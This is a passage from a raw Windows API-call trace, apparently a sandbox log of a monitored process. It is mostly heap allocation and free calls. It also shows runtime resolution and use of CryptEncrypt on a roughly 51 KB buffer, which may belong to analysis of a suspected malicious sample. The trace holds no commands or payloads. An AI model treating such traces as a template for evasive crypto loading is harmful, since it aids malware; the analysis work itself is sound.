dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24dd3e0 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0257.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa2e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.954] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0257.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.955] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xc87b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xc880) returned 1 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0257.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0257.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0257.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0257.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0257.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0257.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0257.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0257.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0257.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0257.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0257.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0257.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0257.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0257.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.958] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0257.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.959] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.959] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.959] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.960] CharLowerBuffW (in: lpsz="byte[51328]", cchLength=0xb | out: lpsz="byte[51328]") returned 0xb [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0257.962] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0257.962] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.962] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.962] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.962] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.962] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.963] RtlAllocateHeap 